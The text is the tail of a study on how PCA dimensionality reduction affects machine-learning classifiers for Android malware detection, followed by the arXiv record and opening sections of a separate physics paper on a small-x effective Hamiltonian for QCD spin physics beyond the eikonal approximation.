For Decision Tree, the results declined after PCA was applied. When PCA 0.85 was applied, the F-beta score dropped to 0.967 from 0.978. R values of 0.90, 0.95 and 0.99 gave the same result of 0.966. SVM also gave poorer results compared to the original results. At R=0.85, the F-beta score decreased by 1%. However, the value improved gradually when we applied higher R values. When R=0.99 was applied, the difference was only 0.004. Similarly, Logistic Regression gave lower results at 0.85 but the results slightly improved when R=0.90 was applied. These results showed us that applying PCA does not necessarily improve the F-beta score. As for the other evaluation metrics, please refer to the appendix. \begin{table} \begin{tabular}{|l|l|l|l|} \hline Classifier & TPR (True Positive Rate) & FPR (False Positive Rate) & F beta Score \\ \hline Decision Tree & 0.973810 & 0.019305 & 0.978411 \\ \hline SVM & 0.961111 & 0.008280 & 0.981564 \\ \hline Logistic Regression & 0.976190 & 0.004850 & 0.988858 \\ \hline \end{tabular} \end{table} Table 3: Results from cited literature Figure 14: F-beta Score Results Based on Different PCA R Values ### Results from CIC-InvesAndMal2019 For the CIC-InvesAndMal2019 dataset, we selected 2 reference papers for our research. The first paper (Sangal, Aviral., 2020) applied Principal Component Analysis (PCA), which is a feature reduction technique, for malware detection. For the data processing phase, the researchers ensured that there were no missing values. Principal Component Analysis was applied after the data processing phase and a total of 100 attributes were selected. 10-fold cross-validation was applied for the classification. However, there was no mention of the variance applied for PCA. For the classifiers, Naive Bayes (NB), Support Vector Machine (SVM), Random Forest, Decision Tree, and Nearest Neighbours (K1) were used in the paper. The researchers performed the experiment in WEKA, which we similarly applied in our research.
The accuracy results of the related paper are shown below in Table 4. The second paper (Viraj Kudtarkar., 2020) had only 384 samples of botnet applications and 1105 samples of clean, non-malicious applications. The researcher extracted the data using the APK tool after decompressing the APK files and extracting the required features from the source code. This extraction included essential information such as intents and user permissions. A total of 18 features were selected in the data selection and data pre-processing phase. The researcher then divided the data into 70:30 portions for training and testing respectively. For the classification algorithms, five classifiers were used for training, namely Naive Bayes (NB), Support Vector Machine (SVM), Random Forest, Decision Tree, and Logistic Regression, as shown below in Table 5. The result from the cited paper is shown below without PCA. Both papers had 4 algorithms in common, with one additional algorithm that differed between them. For our experiment, we included both additional algorithms, namely Nearest Neighbours and Logistic Regression, to align the measurements. We defined 4 different PCA variances, R=0.85, R=0.9, R=0.95 and R=0.99, to compare which gives the most effective and reliable model. Accuracy, Precision, Recall and F-Measure are the evaluation metrics for the algorithms. Random Forest had the highest accuracy after the application of PCA with 96.05%. Naive Bayes had the lowest accuracy rate of 88.23%. Meanwhile, the second paper had the highest accuracy result of 95.40% for the Logistic Regression classifier. On the other hand, SVM had low accuracy compared to the others with 83.10%. Decision Tree, Naive Bayes, and Logistic Regression saw their accuracies drop significantly after applying PCA with the different variances. \begin{table} \begin{tabular}{|l|l|l|l|l|} \hline Classifier (PCA) & Accuracy Result & Precision & Recall & F-Measure \\ \hline Naive Bayes (NB) & 88.23\% & 0.877 & 0.882 & 0.877 \\ \hline SVM & 91.26\% & 0.912 & 0.913 & 0.908 \\ \hline Random Forest & 96.05\% & 0.96 & 0.961 & 0.969 \\ \hline Decision Tree (J48) & 92.90\% & 0.929 & 0.929 & 0.931 \\ \hline Nearest Neighbours (ibk) K 1 & 93.88\% & 0.939 & 0.939 & 0.925 \\ \hline \end{tabular} \end{table} Table 4: Results from cited literature above, Aviral Sangal [5] \begin{table} \begin{tabular}{|l|l|l|l|l|} \hline Classifier & Accuracy Result & Precision & Recall & F-Measure \\ \hline Naive Bayes & 94.80\% & 0.841 & 0.958 & 0.891 \\ \hline SVM & 83.10\% & 0.841 & 0.958 & 0.891 \\ \hline Random Forest & 87.60\% & 0.879 & 0.97 & 0.917 \\ \hline Decision Tree & 94.30\% & 0.945 & 0.982 & 0.959 \\ \hline Logistic Regression & 95.40\% & 0.949 & 0.994 & 0.964 \\ \hline \end{tabular} \end{table} Table 5: Results from cited literature above, (Viraj Kudtarkar., 2020) Based on our results, changing the variance R did not significantly change the accuracy except for Random Forest, where using R=0.85 resulted in the best accuracy of 99.89%; the other Random Forest results were 90.40% and 90.30% when using the other variances. The rest of the classifiers had significant changes in accuracy depending on the variance applied. From the results we observed that variance R=0.85 is the best for the Random Forest and K Nearest Neighbor classifiers, which had the best accuracy. When the R value was increased slightly by 0.05 and set to 0.9, the results dropped significantly for Random Forest and K Nearest Neighbors. There was no significant difference between 0.95 and 0.99.
The recall result gradually decreased when the R value was increased. The recall result at 0.85 was 0.871, and it gradually dropped to 0.741, 0.742 and 0.736. This again shows that overfitting or underfitting of features will not achieve optimum results. Figure 15: Accuracy Results Based on Different PCA R Values ## 8 Conclusion & Discussion Principal Component Analysis (PCA) is a dimension reduction technique widely used in various scientific industries that handle large, high dimensional datasets, where the number of features is greater than the amount of data. For example, it is commonly used in computer vision, in image recognition and to produce 2-dimensional data for visualization. However, there has been a lack of study of the effects of dimensional reduction techniques on Computational Forensics, and specifically on malware detection and analysis. This study focuses on the application of PCA in the analysis of 3 different malware analysis related datasets containing Android malware. We also evaluate the impact of imbalanced classes within the datasets together with dimensional reduction. Based on our experiments, in which we conducted parallel experiments to those done by other researchers on the same datasets, we observed that the performance measurements of machine learning models are generally comparable, with marginal degradation, on dimensionally reduced datasets after the application of PCA. We did observe notable degradation within the variance range of 0.85 to 0.99 when PCA was applied to the datasets. There were a few improvements observed, with no noted pattern or specific algorithms. With imbalanced classes within the dataset, we observed that combining the Synthetic Minority Oversampling Technique (SMOTE) with dimensionality reduction led to performance degradation as the variance was reduced. For future work, we hope to extend our work to different malware datasets, including dynamic and memory forensic datasets for Android malware. Other dimension reduction and feature selection techniques can be included in our future studies to improve the processing of high dimensional data generated by intrusion detection systems.
2304.12842
Small $x$ Physics Beyond Eikonal Approximation: an Effective Hamiltonian Approach
Understanding the spin structure of hadrons in the small $x$ regime is an important direction to unravel the spin puzzle in hadronic physics. To include spin degrees of freedom in the small $x$ regime requires going beyond the usual eikonal approximation in high energy QCD. We developed an effective Hamiltonian approach to study spin related observables in the small $x$ regime using the shockwave formalism. The small-$x$ effective Hamiltonian incorporates both quark and gluon propagators in the background fields and the background field induced interaction vertices up to next-to-eikonal order. A novel feature of sub-eikonal interactions is the background gluon field induced gluon radiation inside the shockwave. Its relation to chromo-electrically polarized Wilson line correlator is established both in small $x$ helicity evolution and in longitudinal double-spin asymmetry for gluon production.
Ming Li
2023-04-25T14:16:33Z
http://arxiv.org/abs/2304.12842v2
# Small \(x\) Physics Beyond Eikonal Approximation: an Effective Hamiltonian Approach ###### Abstract Understanding the spin structure of hadrons in the small \(x\) regime is an important direction to unravel the spin puzzle in hadronic physics. To include spin degrees of freedom in the small \(x\) regime requires going beyond the usual eikonal approximation in high energy QCD. We developed an effective Hamiltonian approach to study spin related observables in the small \(x\) regime using the shockwave formalism. The small-\(x\) effective Hamiltonian incorporates both quark and gluon propagators in the background fields and the background field induced interaction vertices up to next-to-eikonal order. A novel feature of sub-eikonal interactions is the background gluon field induced gluon radiation inside the shockwave. Its relation to chromo-electrically polarized Wilson line correlator is established both in small \(x\) helicity evolution and in longitudinal double-spin asymmetry for gluon production. ## 1 Introduction * 2 Small-\(x\) Effective Hamiltonian * 2.1 Light-cone Hamiltonian in the background fields * 2.2 Expansion in eikonality * 2.3 Effective light-cone Hamiltonian up to sub-eikonal order * 3 Single Particle Scattering Amplitude * 3.1 Single (anti)quark scattering amplitude * 3.2 Single gluon scattering amplitude * 3.3 Background field induced quark-gluon conversion * 3.4 Quark-antiquark pair converted to two gluons * 4 Gluon Radiation Inside the Shockwave * 4.1 Longitudinal double-spin asymmetry for soft gluon production * 4.2 Small \(x\) evolution of polarized Wilson line correlator * 4.2.1 Operator treatment * 4.2.2 Directly calculating the diagrams * 5 Summary * A Boost Transformations of Vector and Spinor Fields * B Convention for Light-Cone Quantization * C Sub-eikonal Transformations Related to \(a^{-}\) Field Introduction Understanding the spin structure of proton is one of the central problems in hadronic physics. Since the discovery by the European Muon Collaboration (EMC) [1] showing that quark's intrinsic spin only contributes to a small portion of proton's spin, many experimental and theoretical efforts were devoted to understanding the proton spin puzzle [2; 3; 4; 5]. Theoretical studies [6; 7] point out that besides quark's intrinsic spin, gluon's intrinsic spin (helicity), quark and gluon orbital angular momentum can contribute to proton spin. To study the fraction of proton's spin from gluon, significant advancement was made by the RHIC spin program [3; 8] at the Brookhaven National Laboratory measuring the double-spin asymmetry for particle and jet productions in longitudinally polarized proton-proton collisions. Including some of the experimental measurements into theoretical global analysis for extracting parton distribution functions \(f(x,Q^{2})\) found that gluons in the range \(0.05<x<1\) constitute approximately 40% of the proton's spin at \(Q^{2}=10\,\mathrm{GeV}\)[9; 10; 11]. Estimating and constraining gluon helicity distribution at even smaller values of \(x\) is currently under active theoretical study [12] and it is also one of the main goals of the future Electron-Ion Collider experiment [4]. The collinear factorization formalism has been the cornerstone to study the double-spin asymmetry in longitudinally polarized proton-proton collisions, dating back to the tree-level partonic cross sections first incorporated in [13; 14]. 
More recently, global analyses based on the generalization to next-to-leading order perturbative QCD contributions within the collinear factorization framework were carried out in [9; 10; 11]. This approach is particularly applicable when the produced particles and jets have large transverse momentum. However, inclusive particle and jet productions with large transverse momentum, especially at midrapidity, are usually insensitive to gluons at small \(x\), whose typical transverse momentum is the gluon saturation scale \(Q_{s}\) in the saturation regime [15; 16; 17]. To probe gluon helicity at smaller \(x\), one needs to include the effect of multiple scattering with small \(x\) gluons and concentrate on particle/jet productions at moderate values of transverse momentum. Unfortunately, the collinear factorization formalism ceases to be applicable for particle and jet productions with transverse momentum around \(Q_{s}\). A more general transverse momentum dependent treatment beyond the collinear factorization formalism is desired. To facilitate calculating spin related observables in the small \(x\) limit directly within the transverse momentum dependent framework, we develop an effective Hamiltonian approach within the shockwave formalism. This approach is inspired by the seminal work [18], in which the authors studied high energy QED in external fields. We derived the small-\(x\) effective Hamiltonian that describes high energy QCD processes up to sub-eikonal order. As is well known, leading order QCD processes in the high energy limit (eikonal approximation) are insensitive to spin degrees of freedom. To probe the spin of quarks and gluons inside the proton, one has to go beyond the eikonal approximation. We work in the shockwave formalism, treating the proton as background quark and gluon fields. The light-cone Hamiltonian for QCD in the background fields is then expanded in the eikonality parameter \(\xi=e^{-\Delta Y}\), with \(\Delta Y\) being the rapidity difference between the projectile and target. The effective light-cone Hamiltonian up to linear order in \(\xi\) is sufficient to calculate spin related observables at small \(x\). This effective Hamiltonian contains both propagators and effective interaction vertices for quarks and gluons. The quadratic terms in the effective Hamiltonian automatically generate the single quark and the single gluon scattering amplitudes at small \(x\), the so-called polarized Wilson lines that have already been obtained in the literature by several groups [19; 20; 21; 22; 12]. There are three different interaction vertices in the effective Hamiltonian. At order \(\xi^{1/2}\), one has the background quark field induced quark-gluon conversion. At order \(\xi\), one has the background gluon field induced quark-antiquark-gluon vertex and gluon-gluon-gluon vertex. These three vertices are responsible for the additional complications and new features in spin related observables at small \(x\). The three-particle interaction vertex induced by the background gluon field predicts that a gluon can be emitted inside the shockwave at the sub-eikonal order. This is a new feature compared to the well-known physics at the eikonal order, in which gluons are only allowed to be radiated either before or after interacting with the shockwave. It introduces additional contributions when calculating particle productions in polarized collisions and when evaluating the small \(x\) rapidity evolutions of various transverse momentum dependent distribution functions [23; 24].
To determine the significance of this phenomenon, we have performed explicit calculations of the process wherein a soft gluon is emitted inside a shockwave and have derived its contribution to the double-spin asymmetry for soft gluon production. Additionally, we have computed how the emission of gluons inside the shockwave affects the rapidity evolution of polarized Wilson line correlators. In both cases, we found that this effect is manifested in terms of the chromo-electrically polarized Wilson line correlator \(\langle{\rm Tr}[U_{\bf x}^{iG[2]}U_{\bf y}^{\dagger}]\rangle\), which has been shown to be directly related to the small \(x\) limit of the gluon helicity TMD [12]. The paper is organized as follows. In Sec. 2, the small-\(x\) effective Hamiltonian of QCD together with the formalism to calculate scattering processes at the sub-eikonal order are developed. As an application of this formalism, the single quark/gluon scattering amplitudes at the sub-eikonal order are reproduced in Sec. 3. Sec. 4 is devoted to studying the significance of gluon radiation inside the shockwave. Discussions and conclusions are given in Sec. 5. ## 2 Small-\(x\) Effective Hamiltonian There are several approaches to studying QCD at small \(x\). The most widely used approach is to start from the full QCD theory, calculate physical quantities and the relevant Feynman diagrams, and finally take the small \(x\) limit, typically by setting the center-of-mass collision energy \(\sqrt{s}\) to be very large. However, we follow a different approach. Rather than using the complete QCD theory, we initially determine the effective QCD Hamiltonian, which is only applicable in the small \(x\) limit. We then utilize this small-\(x\) effective Hamiltonian to directly compute interesting physical quantities in the small \(x\) limit. To study small \(x\) physics, we adopt the shockwave formalism, which treats the target as background quark and gluon fields in the collision with the projectile. This enables us to describe the collision processes using QCD theory in background fields. This approach is the same as high-energy scattering by external fields, wherein the external fields are highly Lorentz contracted. ### Light-cone Hamiltonian in the background fields Let the QCD Lagrangian density be \[\mathcal{L}=-\frac{1}{4}F^{a}_{\mu\nu}F^{a,\mu\nu}+\frac{1}{2}\bar{\Psi}i\gamma^{\mu}\overleftrightarrow{D_{\mu}}\Psi-m\bar{\Psi}\Psi \tag{1}\] with the field strength tensor \(F^{\mu\nu}=\partial^{\mu}A^{\nu}-\partial^{\nu}A^{\mu}+ig[A^{\mu},A^{\nu}]\). The covariant derivatives are defined by \(\overleftrightarrow{D_{\mu}}=\overrightarrow{D_{\mu}}-\overleftarrow{D_{\mu}}\) with \(\overleftarrow{D_{\mu}}=\overleftarrow{\partial_{\mu}}-igA_{\mu}\) and \(\overrightarrow{D_{\mu}}=\partial_{\mu}+igA_{\mu}\). Here \(A_{\mu}=A^{a}_{\mu}t^{a}\) is defined in the fundamental representation of the \(SU(3)\) color group. The fermion mass is denoted by \(m\). In the spirit of the shockwave formalism, the nuclear target is characterized as classical gluon and quark fields in the small \(x\) limit. Denoting the background gluon fields and quark fields as \(a^{a}_{\mu}\) and \(\psi\) respectively, one makes the substitution \[A^{a}_{\mu}\to A^{a}_{\mu}+a^{a}_{\mu},\qquad\Psi\to\Psi+\psi \tag{2}\] into eq. (1) to obtain the Lagrangian density in the background fields [25].
\[\begin{split}\mathcal{L}=&-\frac{1}{4}\mathcal{F}^{e}_{\mu\nu}\mathcal{F}^{e,\mu\nu}+\frac{1}{2}\bar{\Psi}i\gamma^{\mu}\overleftrightarrow{\mathcal{D}_{\mu}}\Psi-g\bar{\Psi}A_{\mu}\gamma^{\mu}\Psi-m\bar{\Psi}\Psi\\ &-\frac{1}{2}igf^{e}_{\mu\nu}[A^{\mu},A^{\nu}]^{e}-g\bar{\Psi}\gamma^{\mu}A_{\mu}\psi-g\bar{\psi}\gamma^{\mu}A_{\mu}\Psi.\end{split} \tag{3}\] The field strength tensor in the background field is defined as \(\mathcal{F}_{\mu\nu}=\mathcal{D}_{\mu}A_{\nu}-\mathcal{D}_{\nu}A_{\mu}+ig[A_{\mu},A_{\nu}]\). The covariant derivatives in the background field are \(\overrightarrow{\mathcal{D}_{\mu}}=\partial_{\mu}+iga_{\mu}\) and \(\overleftarrow{\mathcal{D}_{\mu}}=\overleftarrow{\partial_{\mu}}-iga_{\mu}\). The background fields are assumed to satisfy the classical equations of motion. Here \(f_{\mu\nu}=\partial_{\mu}a_{\nu}-\partial_{\nu}a_{\mu}+ig[a_{\mu},a_{\nu}]\). We use calligraphic letters to indicate expressions in which the ordinary derivative \(\partial_{\mu}\) is replaced by the covariant derivative \(\mathcal{D}_{\mu}\) in the background field \(a_{\mu}\) only. We would like to obtain the corresponding Hamiltonian density from the Lagrangian density in eq. (3) in the light-cone gauge \(A^{+}=0\). Although the precise dynamics of the background fields themselves are not relevant to the current discussion, we also require that \(a^{+}=0\) (see Footnote 1). In the light-cone gauge, the field components \(A^{-},\Psi_{B}=\mathcal{P}_{B}\Psi\) are dependent fields and they can be expressed in terms of the independent fields \(A^{i},\Psi_{G}=\mathcal{P}_{G}\Psi\) [26; 27]. Here the spinor space projection operators are defined as \(\mathcal{P}_{G}=\frac{1}{2}\gamma^{-}\gamma^{+}\), \(\mathcal{P}_{B}=\frac{1}{2}\gamma^{+}\gamma^{-}\). One then has the decomposition of the quark field into good and bad components, \(\Psi=\Psi_{G}+\Psi_{B}\). Footnote 1: A more general discussion in which \(a^{+}\) is nonvanishing can be found in [19]. On the other hand, terms containing \(a^{+}\) are of even higher order in eikonality and will not contribute to the effective Hamiltonian up to sub-eikonal order.
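As a short worked check (added here for orientation rather than taken from the original derivation), these projectors behave as expected assuming the standard light-cone convention \(\{\gamma^{+},\gamma^{-}\}=2\) and \((\gamma^{\pm})^{2}=0\): \[\mathcal{P}_{G}+\mathcal{P}_{B}=\tfrac{1}{2}\gamma^{-}\gamma^{+}+\tfrac{1}{2}\gamma^{+}\gamma^{-}=\tfrac{1}{2}\{\gamma^{+},\gamma^{-}\}=1,\qquad\mathcal{P}_{G}^{2}=\tfrac{1}{4}\gamma^{-}\gamma^{+}\gamma^{-}\gamma^{+}=\tfrac{1}{4}\gamma^{-}\left(2-\gamma^{-}\gamma^{+}\right)\gamma^{+}=\mathcal{P}_{G},\qquad\mathcal{P}_{G}\mathcal{P}_{B}=\tfrac{1}{4}\gamma^{-}(\gamma^{+})^{2}\gamma^{-}=0,\] so that \(\Psi=\Psi_{G}+\Psi_{B}\) is a complete and orthogonal decomposition of the quark field.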
To calculate the Hamiltonian density, one uses \[\mathcal{H}=\frac{\delta\mathcal{L}}{\delta(\partial_{+}A^{i})}\partial_{+}A^ {i}+\frac{\delta\mathcal{L}}{\delta(\partial_{+}\Psi_{G})}\partial_{+}\Psi_{ G}+\partial_{+}\Psi_{G}^{\dagger}\frac{\delta\mathcal{L}}{\delta(\partial_{+} \Psi_{G}^{\dagger})}-\mathcal{L}, \tag{4}\] to obtain the light-cone Hamiltonian in the background fields \[\begin{split}\mathcal{H}=&\frac{1}{2}\mathcal{F}_{a}^{+ -}\mathcal{F}_{a}^{+-}+\frac{1}{4}\mathcal{F}_{a}^{ij}\mathcal{F}_{a,ij}+\frac {1}{2}igf_{ij}^{a}[A^{i},A^{j}]^{a}+a_{b}^{-}\left(-ig[A^{i},\mathcal{F}^{+i}] _{b}+g\bar{\Psi}\gamma^{+}t^{b}\Psi\right)\\ &+\frac{1}{2}\bar{\Psi}_{B}i\gamma^{-}\overset{\leftrightarrow}{ \partial_{-}}\Psi_{B}+g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g\bar{\psi}_{B} \gamma^{i}A_{i}\Psi_{G}.\end{split} \tag{5}\] It is supplemented by the constraint equations expressing the dependent fields \(A^{-},\Psi_{B}\) as \[\Psi_{B}=\frac{\gamma^{+}}{2i\partial_{-}}\Big{[}(-i\gamma^{i}\mathcal{D}_{i} +g\gamma^{i}A_{i}+m)\Psi_{G}+g\gamma^{i}A_{i}\psi_{G}\Big{]} \tag{6}\] and \[A^{-}=\frac{-1}{\partial_{-}}\left(\mathcal{D}_{i}A^{i}+\frac{1}{\partial_{-} }J^{+}\right) \tag{7}\] with the light-cone time component of the color current \(J^{+}=J_{0}^{+}+J_{\text{int}}^{+}\) being \[\begin{split} J_{0}^{+}&=-ig[F^{+i},A_{i}]_{b}+g \sqrt{2}\Psi_{G}^{\dagger}t^{b}\Psi_{G},\\ J_{\text{int}}^{+}=&-2ig[f^{+i},A_{i}]^{b}+g\sqrt{ 2}\Psi_{G}^{\dagger}t^{b}\psi_{G}+g\sqrt{2}\psi_{G}^{\dagger}t^{b}\Psi_{G}. \end{split} \tag{8}\] Here \(J_{0}^{+}\) is independent of the background fields while \(J_{\text{int}}^{+}\) explicitly depends on the background fields. The inverse derivative is understood as \(\frac{1}{\partial_{-}}\mathcal{F}^{a}(x^{-})=\frac{1}{2}\int_{-\infty}^{+ \infty}dz^{-}\epsilon(x^{-}-z^{-})\mathcal{F}^{a}(z^{-})\) assuming antisymmetric boundary condition Note that in eq. (5) the dependence on \(A^{-}\) is only through \(\mathcal{D}_{-}A^{-}\equiv\mathcal{F}^{+-}\), the chromoelectric fields. The various terms in eq. (5) have clear physical meanings. The first two terms represent the energy density from chromoelectromagnetic fields in the background fields. The third term characterizes the background gluon fields induced mass term for the dynamical gluon fields. The fourth term is the ususal coupling of the current \(J^{+}a^{-}\) with the background fields. The fifth term characterizes fermions' contribution to the energy density. The last two terms describe the conversion between quarks and gluons induced by background fermion fields. Plugging eqs. (6) and (7) into eq. (5), the light-cone Hamiltonian density \(\mathcal{H}=\mathcal{H}_{0}+\mathcal{V}_{0}+\mathcal{V}_{B}\) contains the free Hamiltonian density \(\mathcal{H}_{0}\), the vacuum interaction \(\mathcal{V}_{0}\) and the interaction with the background fields \(\mathcal{V}_{B}\). \[\begin{split}\mathcal{H}_{0}+\mathcal{V}_{0}=&- \frac{1}{2}A_{a}^{i}\partial_{\partial}\partial^{l}A_{i}^{a}+\left(\partial_{i} A^{i}+\frac{1}{2\partial_{-}}J_{0}^{+}\right)\frac{1}{\partial_{-}}J_{0}^{+}\\ &+ig[A_{i},A_{j}]_{b}\partial^{i}A_{j}^{j}+\frac{1}{4}(ig)^{2}[A^ {i},A^{j}]_{b}[A_{i},A_{j}]_{b}\\ &+\frac{i}{\sqrt{2}}\left(\Phi_{B}^{\dagger}\partial_{-}\Phi_{B}- \partial_{-}\Phi_{B}^{\dagger}\Phi_{B}\right)\end{split} \tag{9}\] with \[\Phi_{B}=\frac{\gamma^{+}}{2i\partial_{-}}(-i\gamma^{i}\partial_{i}+g\gamma^{ i}A_{i}+m)\Psi_{G}. \tag{10}\] Eq. (9) is the well-known light-cone Hamiltonian [26] without background fields. 
The interaction with background fields has the following expression \[\begin{split}\mathcal{V}_{B}=&-\frac{1}{2}A_{a}^{i} \Big{(}(\mathcal{D}_{l}\mathcal{D}^{l}-\partial_{l}\partial^{l})^{ac}g_{ij}+2 ig(f_{ij})^{ac}\Big{)}A_{c}^{j}+\left(\partial_{i}A^{i}+\frac{1}{2\partial_{-}}J_{0}^ {+}\right)\frac{1}{\partial_{-}}J_{\text{int}}^{+}\\ &+\left(ig[a_{i},A^{i}]+\frac{1}{2\partial_{-}}J_{\text{int}}^{+} \right)\frac{1}{\partial_{-}}\left(J_{0}^{+}+J_{\text{int}}^{+}\right)-g^{2} \left[a^{i},A^{j}\right]\left[A_{i},A_{j}\right]+a^{-}J_{0}^{+}\\ &+\frac{g}{2\sqrt{2}}\Big{\{}-\left(\Psi_{G}^{\dagger}\gamma^{i} a_{i}+\psi_{G}^{\dagger}\gamma^{i}A_{i}\right)\gamma^{-}\Phi_{B}-\partial_{-} \Phi_{B}^{\dagger}\frac{\gamma^{+}}{\partial_{-}}\left(\gamma^{i}a_{i}\Psi_{G }+\gamma^{i}A_{i}\psi_{G}\right)\\ &\quad+ig\left(\Psi_{G}^{\dagger}\gamma^{i}a_{i}+\psi_{G}^{ \dagger}\gamma^{i}A_{i}\right)\frac{1}{\partial_{-}}\left(\gamma^{i}a_{i}\Psi _{G}+\gamma^{i}A_{i}\psi_{G}\right)+h.c.\Big{\}}\\ &+g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g\bar{\psi}_{B}\gamma^{ i}A_{i}\Psi_{G}.\end{split} \tag{11}\] Our focus lies in studying interactions that occur up to sub-eikonal order in high energy QCD. However, not all interaction terms in eq. (11) contribute to sub-eikonal order. Hence, it becomes imperative to identify and isolate the sub-eikonal contributions. To achieve this, we introduce the eikonality parameter and proceed to expand the Hamiltonian as a power series expansion in terms of this parameter in the subsequent section. ### Expansion in eikonality The light-cone Hamiltonian obtained in the previous section is \[H=\int d^{2}\mathbf{x}dx^{-}\mathcal{H}=H_{0}+V=H_{0}+V_{0}+V_{B}. \tag{12}\] Recall the definition of \(S\)-matrix operator \[\hat{S}\equiv S(+\infty,-\infty)=\mathcal{P}\text{exp}\left\{-i\int_{-\infty }^{+\infty}dz^{+}V_{\text{I}}(z^{+})\right\}. \tag{13}\] \(S\)-matrix element is calculated by \(S_{\text{fi}}=\langle\phi_{\text{f}}|\hat{S}|\phi_{\text{i}}\rangle\) with \(|\phi_{\text{i}}\rangle\) and \(\langle\phi_{\text{f}}|\) being the eigenstates of free Hamiltonian \(H_{0}\) at asymptotic time \(x^{+}=-\infty\) and \(x^{+}=+\infty\) respectively. The interaction terms of the Hamiltonian in the interaction picture is defined by \(V_{\text{I}}(z^{+})=e^{iH_{0}(z^{+}-z_{0}^{+})}V(z_{0}^{+})e^{-iH_{0}(z^{+}-z_{ 0}^{+})}\) with \(z_{0}^{+}\) the reference time. We further assume the interaction with background fields only happen within the range \([x^{+},x_{0}^{+}]\). The \(S\)-matrix operator thus has the factorized form \(\hat{S}=S(+\infty,x^{+})S(x^{+},x_{0}^{+})S(x_{0}^{+},-\infty)\) in which \(V_{B}\) only contributes to \(S(x^{+},x_{0}^{+})\). We are particularly interested in states that have large longitudinal momentum. To obtain these states, we boost the states \(|\phi_{\text{i}}\rangle\) and \(\langle\phi_{\text{f}}|\). Mathematically, it is implemented by \[|\phi_{\text{i}}\rangle_{B}=e^{-i\omega\hat{K}^{3}}|\phi_{\text{i}}\rangle. \tag{14}\] Here \(\hat{K}^{3}\) is the Lorentz boost operator along the \(z\) direction and the parameter \(\omega\) characterizes the amount of boost. Noted that the boosted states are still eigenstates of the light-cone Hamiltonian because \(\hat{H}_{0}e^{-i\omega\hat{K}^{3}}|\phi_{\text{i}}\rangle=e^{-\omega}e^{-i \omega\hat{K}^{3}}\hat{H}_{0}|\phi_{\text{i}}\rangle=(e^{-\omega}E_{i})e^{-i \omega\hat{K}^{3}}|\phi_{\text{i}}\rangle\) with the help of \(e^{i\omega\hat{K}^{3}}\hat{H}_{0}e^{-i\omega\hat{K}^{3}}=e^{-\omega}\hat{H}_{0}\)[18, 27]. 
To calculate \(S\)-matrix element between highly boosted states, instead of directly boosting the states, it is convenient to shift the boosting to the interactions [18]. \[\begin{split} S_{\rm fi}=&_{B}\langle\phi_{\rm f}|{\cal P} \mbox{exp}\left\{-i\int_{-\infty}^{+\infty}dz^{+}V_{\rm I}(z^{+})\right\}|\phi_ {\rm i}\rangle_{B}\\ =&\langle\phi_{\rm f}|{\cal P}\mbox{exp}\left\{-i\int_{- \infty}^{+\infty}dz^{+}e^{i\omega\hat{K}^{3}}V_{\rm I}(z^{+})e^{-i\omega\hat{ K}^{3}}\right\}|\phi_{\rm i}\rangle.\end{split} \tag{15}\] The interaction term is transformed by boosting as \[e^{i\omega\hat{K}^{3}}V_{\rm I}(z^{+})e^{-i\omega\hat{K}^{3}}=e^{iH_{0}e^{- \omega}(z^{+}-z_{0}^{+})}\left[e^{i\omega\hat{K}^{3}}V(z_{0}^{+})e^{-i\omega \hat{K}^{3}}\right]e^{-iH_{0}e^{-\omega}(z^{+}-z_{0}^{+})} \tag{16}\] To increase the collision energy in a scattering process, one can either boost the projectile or boost the target in the opposite direction. For the interaction with background fields, we find it convenient to boost the background fields instead of directly boosting the states. For that, we will need to reverse the sign of the boost parameter in the above expressions \(\omega\to-\omega\). We also introduce the rescaled lightcone time \(\tilde{x}^{+}=e^{\omega}x^{+}\). The \(S\)-matrix element in eq. (15) becomes \[S_{\rm fi}=\langle\phi_{\rm f}|{\cal P}\mbox{exp}\left\{-i\xi\int_{-\infty}^{ +\infty}d\tilde{z}^{+}\widetilde{V}_{\rm I}(\tilde{z}^{+})\right\}|\phi_{\rm i}\rangle \tag{17}\] Here the interaction with background fields is first boosted and then transformed into the interaction picture by \[\begin{split}\widetilde{V}(\tilde{z}_{0}^{+})&=e^{-i \omega K^{3}}V(z_{0}^{+})e^{i\omega K^{3}},\\ \widetilde{V}_{\rm I}(\tilde{z}^{+})&=e^{iH_{0}( \tilde{z}^{+}-\tilde{z}_{0}^{+})}\widetilde{V}(\tilde{z}_{0}^{+})e^{-iH_{0}( \tilde{z}^{+}-\tilde{z}_{0}^{+})}.\end{split} \tag{18}\] We have introduced the eikonality parameter \(\xi=e^{-\omega}\) in eq. (17). Identifying \(\xi=e^{-\Delta Y}\) with the rapidity difference between the projectile and target \(\Delta Y=|Y_{P}-Y_{T}|\), the high energy limit \(\Delta Y\to\infty\) corresponds to \(\xi\to 0\). In the case of deep inelastic scattering in which the Bjorken small-x parameter is defined by \(x=\frac{Q^{2}}{2{\cal P}\cdot q}\) with \(P^{2}=m_{N}^{2}\) and \(q^{2}=-Q^{2}\), the eikonality parameter is found to be linearly related to the small-x Bjorken parameter \(\xi=xe^{-\frac{m_{N}}{Q}}\). Therefore, the eikonality parameter is nothing but the small-\(x\) parameter up to a positive constant multiplicative factor. Consequently, calculating the \(S\)-matrix element in the high energy limit is equivalent to expanding eq. (17) as power series expansion in \(\xi\). 
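As a rough numerical orientation (the kinematic values below are illustrative assumptions, not taken from the text), the multiplicative factor relating the two parameters is close to unity for typical DIS kinematics:
\[Q=10\ \text{GeV},\qquad m_{N}\simeq 0.94\ \text{GeV}\quad\Longrightarrow\quad \xi=x\,e^{-m_{N}/Q}\simeq 0.91\,x,\]
so an expansion in the eikonality parameter \(\xi\) is, for all practical purposes, an expansion in Bjorken \(x\).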
